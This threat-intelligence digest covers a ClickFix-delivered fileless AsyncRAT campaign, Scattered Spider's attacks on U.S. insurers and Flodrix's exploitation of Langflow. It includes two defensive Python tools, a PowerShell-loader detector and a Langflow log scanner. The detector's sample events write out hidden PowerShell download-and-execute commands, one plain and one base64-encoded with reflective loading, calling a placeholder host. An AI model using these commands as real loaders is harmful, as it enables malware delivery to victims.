Update: Fileless AsyncRAT Campaign Targets Users with Fake Verification Prompts
A campaign delivering a fileless variant of AsyncRAT has been uncovered. The specific threat actor has not been conclusively identified, but the tradecraft closely matches earlier AsyncRAT campaigns, so a known group is likely behind it. The lure is the ClickFix technique: a social-engineering method in which the victim is shown a seemingly benign verification prompt, typically styled as a CAPTCHA. In this campaign the page presents a fake "I'm not a robot" checkbox; clicking it silently copies a malicious command to the clipboard, and the page then instructs the victim to paste and run it (ClickFix depends on the user doing this themselves, commonly through the Windows Run dialog). The pasted command launches a hidden PowerShell loader that stages and executes the AsyncRAT payload entirely in memory. Because the payload itself never touches disk, file-based scanning has nothing to inspect, which is how the campaign slips past traditional file-centric security products.

The risk and impact are significant, and the fileless delivery continues to evade many security solutions. Once running, AsyncRAT gives the operator remote access to the host for credential theft, data exfiltration and persistent access, while leaving little on-disk evidence. The campaign has likely been active since April 2025 and fits a broader trend of cybercriminals pairing older malware such as AsyncRAT with more evasive delivery methods. Although the lure could reach anyone, targeting appears concentrated on individuals and organizations in German-speaking regions. Obfuscated scripts and dynamic C2 communication indicate an actively maintained, adaptive operation rather than a one-off.

To defend against these evolving threats, organizations should combine endpoint detection and response (EDR) tooling that inspects process behaviour and memory rather than files alone, proactive network segmentation, and script logging (PowerShell script block logging and AMSI integration, where available) so that in-memory loaders are recorded and can be hunted, rather than remaining undetected because nothing was ever written to disk.
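The execution chain described above (interpreter launched from the Run dialog, hidden window, encoded or download-and-evaluate command line, reflective in-memory load) is what endpoint telemetry can catch even when no file is dropped. The following Python is an added illustration, not code from the original report: it scores Sysmon Event ID 1 / EDR-style process-creation events against those indicators. The event shape, indicator weights, alert threshold and sample events are all assumptions for the example, and the sample URLs use the reserved .invalid TLD.

```python
import base64
import re

# Weighted indicators of a ClickFix-style fileless PowerShell loader. The
# weights are an illustrative assumption, not values from the report; tune
# them against your own telemetry.
INDICATORS = [
    (re.compile(r"-(?:w|win|windowstyle)\s+hidden"), "hidden window", 2),
    (re.compile(r"\b(?:iex|invoke-expression)\b"), "in-memory evaluation", 3),
    (re.compile(r"downloadstring|downloaddata|invoke-webrequest|\birm\b|\biwr\b|net\.webclient"),
     "remote payload fetch", 3),
    (re.compile(r"reflection\.assembly\]::load"), "reflective assembly load", 3),
    (re.compile(r"-(?:nop|noprofile)\b"), "profile suppressed", 1),
    (re.compile(r"-(?:ep|executionpolicy)\s+bypass"), "execution policy bypass", 1),
]
ENCODED_RE = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}
ALERT_THRESHOLD = 5  # assumed cut-off for the example


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def split_encoded(cmdline):
    """Strip an -EncodedCommand blob from the command line and return
    (cmdline_without_blob, decoded_script). PowerShell expects the blob to be
    base64 of UTF-16LE text, so that is how it is decoded here."""
    m = ENCODED_RE.search(cmdline)
    if not m:
        return cmdline, ""
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        decoded = "<undecodable>"  # still counts as an encoded command
    return cmdline[:m.start(1)] + "<blob>", decoded


def score_event(event):
    """Score one process-creation event; returns id, score, reasons and decoded payload."""
    image = _basename(event["image"])
    parent = _basename(event["parent_image"])
    cmdline, decoded = split_encoded(event["command_line"])
    # Scan the visible command line and the decoded payload together.
    text = (cmdline + "\n" + decoded).lower()
    score, reasons = 0, []
    if decoded:
        score += 2
        reasons.append("encoded command")
    for pattern, label, weight in INDICATORS:
        if pattern.search(text):
            score += weight
            reasons.append(label)
    # Win+R launches the interpreter as a child of explorer.exe; scheduled
    # tasks and management agents normally do not.
    if image in INTERPRETERS and parent == "explorer.exe":
        score += 2
        reasons.append("interpreter spawned by explorer.exe (Run dialog pattern)")
    return {"id": event["id"], "score": score, "reasons": reasons, "decoded": decoded}


def detect(events, threshold=ALERT_THRESHOLD):
    """Return the scored events that reach the alert threshold."""
    return [r for r in (score_event(e) for e in events) if r["score"] >= threshold]


# Constructed sample events (not taken from the reported campaign). The encoded
# one is built the way an attacker's generator would build it.
_ENCODED_PAYLOAD = base64.b64encode(
    "$d=(New-Object Net.WebClient).DownloadData('http://example.invalid/b');"
    "[Reflection.Assembly]::Load($d).EntryPoint.Invoke($null,$null)".encode("utf-16-le")
).decode("ascii")
_PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
SAMPLE_EVENTS = [
    {"id": "evt-1", "image": _PS, "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "powershell -w hidden -nop -ep bypass -c \"iex (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/a.ps1')\""},
    {"id": "evt-2", "image": _PS, "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "powershell.exe -nop -w hidden -enc " + _ENCODED_PAYLOAD},
    {"id": "evt-3", "image": _PS, "parent_image": "C:\\Windows\\System32\\svchost.exe",
     "command_line": "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\Scripts\\nightly-backup.ps1"},
    {"id": "evt-4", "image": "C:\\Windows\\System32\\cmd.exe", "parent_image": "C:\\Windows\\explorer.exe",
     "command_line": "cmd.exe /c ipconfig /all"},
]

if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert["id"], alert["score"], "; ".join(alert["reasons"]))
```

Only the two ClickFix-shaped events cross the threshold; the scheduled backup script and the interactive ipconfig stay well below it. The same indicators map directly onto PowerShell script block logs (Event ID 4104), where the decoded payload appears in clear text without needing the base64 step.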
Update: Scattered Spider Expands Its Reach, Targeting U.S. Insurance Sector with New Attack Methods
The Google Threat Intelligence Group (GTIG) has recently identified a surge in intrusions at U.S. insurance companies linked to the threat group Scattered Spider, also tracked as 0ktapus, UNC3944, Scatter Swine, Starfraud and Muddled Libra. We previously reported on the group's focus on retailers in the UK and the U.S.; the insurance sector now appears to be its next target. Two prominent insurers, Philadelphia Insurance Companies (PHLY) and Erie Insurance, disclosed cyberattacks in June 2025 that significantly disrupted their operations: PHLY experienced ongoing outages, and Erie reported "unusual network activity" that prompted immediate protective measures.

These incidents align with Scattered Spider's established tradecraft, which centres on social engineering of help desk and call-centre staff. Operators pressure employees, often with aggressive language, into granting access to critical systems, typically by resetting a password or MFA factor, and they combine this with SIM swapping, MFA fatigue (push bombing) and phishing. The approach has proven effective even against organizations with mature security programs. Once inside, the group has deployed ransomware including RansomHub, Qilin and DragonForce, causing severe damage to victims. The move into insurance is another demonstration of the group's ability to switch industries while reusing the same identity-focused playbook.

To defend against such attacks, organizations must implement strong identity and access controls, including phishing-resistant MFA for high-privilege accounts (push-approval MFA is exactly what MFA fatigue abuses), and train employees, especially those in help desk roles, to recognize social engineering attempts.

Monitoring for unusual sign-in activity, particularly from residential proxy IP ranges the group uses to blend in, and reviewing help desk identity-verification procedures (what a caller must prove before a password or MFA reset is performed) can also provide early warning of a breach in progress.
Flodrix Botnet Exploits Langflow RCE Vulnerability to Launch DDoS Attacks
A new variant of the Flodrix botnet is actively exploiting a critical vulnerability in Langflow, a Python-based framework for building AI agents and workflows, to install malware and launch distributed denial-of-service (DDoS) attacks. The flaw, tracked as CVE-2025-3248 (CVSS score 9.8), lets an unauthenticated attacker execute arbitrary code on unpatched Langflow servers with crafted HTTP requests. It was disclosed and patched in March 2025, and CISA has since flagged it as exploited in the wild. Attackers use publicly available proof-of-concept code to drop malicious shell scripts, which fetch and install the Flodrix bot, establish contact with a command-and-control (C2) server, and launch DDoS attacks against targeted IP addresses. The bot can also reach its C2 over the Tor network, complicating detection and attribution.

Flodrix is an evolution of the LeetHozer botnet linked to the Moobot group, and the new variant's features are aimed at evading detection and minimizing forensic traces: it obfuscates C2 communication, introduces new encrypted DDoS attack types that make traffic analysis harder, and enumerates running processes, which supports both persistence and the targeting of high-value systems. Trend Micro's analysis indicates the variant is under active development, evidenced by several different downloader scripts hosted on the same server, a sign that exploitation is continuing. Organizations should patch vulnerable Langflow instances immediately and avoid exposing the service directly to the internet, monitor for unusual server behaviour such as unexpected outbound downloads or new processes spawned by the Langflow service, and maintain network defences against DDoS traffic and botnet infections.
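As an added triage aid (not code from the article or from Trend Micro), the Python below answers the two questions a defender asks first about CVE-2025-3248: is the installed Langflow version still vulnerable, and has anything untrusted hit the vulnerable endpoint? The fixed version (1.3.0) and the endpoint path (/api/v1/validate/code) are taken from the public advisory for the CVE rather than from the summary above; the trusted CIDRs and the combined-format access-log lines are constructed assumptions for the example.

```python
import ipaddress
import re

# From the public advisory for CVE-2025-3248: releases before 1.3.0 accept an
# unauthenticated POST to this endpoint. Not stated in the summary above.
FIXED_VERSION = (1, 3, 0)
VULN_ENDPOINT = "/api/v1/validate/code"

# Assumed trusted sources: loopback plus an illustrative internal range.
TRUSTED_NETS = [ipaddress.ip_network("127.0.0.0/8"), ipaddress.ip_network("10.0.0.0/8")]

# Combined log format: ip ident user [ts] "METHOD path proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)


def parse_version(v):
    """'1.2.0' -> (1, 2, 0). Only the leading numeric components are compared."""
    parts = re.findall(r"\d+", v)[:3]
    return tuple(int(p) for p in parts) + (0,) * (3 - len(parts))


def is_vulnerable_version(v):
    return parse_version(v) < FIXED_VERSION


def scan_access_log(lines):
    """Return POSTs to the vulnerable endpoint that came from untrusted sources."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined-log-format; skip rather than guess
        if m["method"] != "POST" or not m["path"].startswith(VULN_ENDPOINT):
            continue
        src = ipaddress.ip_address(m["ip"])
        if any(src in net for net in TRUSTED_NETS):
            continue
        hits.append({"ip": m["ip"], "ts": m["ts"], "status": int(m["status"]), "ua": m["ua"]})
    return hits


def triage(version, lines):
    """Combine the version check with the log scan into one summary."""
    hits = scan_access_log(lines)
    by_src = {}
    for h in hits:
        by_src[h["ip"]] = by_src.get(h["ip"], 0) + 1
    return {"vulnerable_version": is_vulnerable_version(version), "hits": hits, "sources": by_src}


# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Jun/2025:03:14:07 +0000] "GET /api/v1/flows/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jun/2025:03:15:22 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 143 "-" "python-requests/2.31"',
    '127.0.0.1 - - [10/Jun/2025:03:16:01 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 143 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [10/Jun/2025:03:15:29 +0000] "POST /api/v1/validate/code HTTP/1.1" 200 143 "-" "curl/8.5.0"',
    '198.51.100.9 - - [10/Jun/2025:03:20:00 +0000] "GET /health HTTP/1.1" 200 2 "-" "kube-probe/1.29"',
]

if __name__ == "__main__":
    result = triage("1.2.0", SAMPLE_LOG)
    print("vulnerable version:", result["vulnerable_version"])
    for ip, n in result["sources"].items():
        print(f"{ip}: {n} POST(s) to {VULN_ENDPOINT}")
```

A 200 response to an unauthenticated POST on that endpoint from an external address is the signal to pivot to host triage: look for shell scripts written by the Langflow process, outbound downloads, and the new child processes the summary describes.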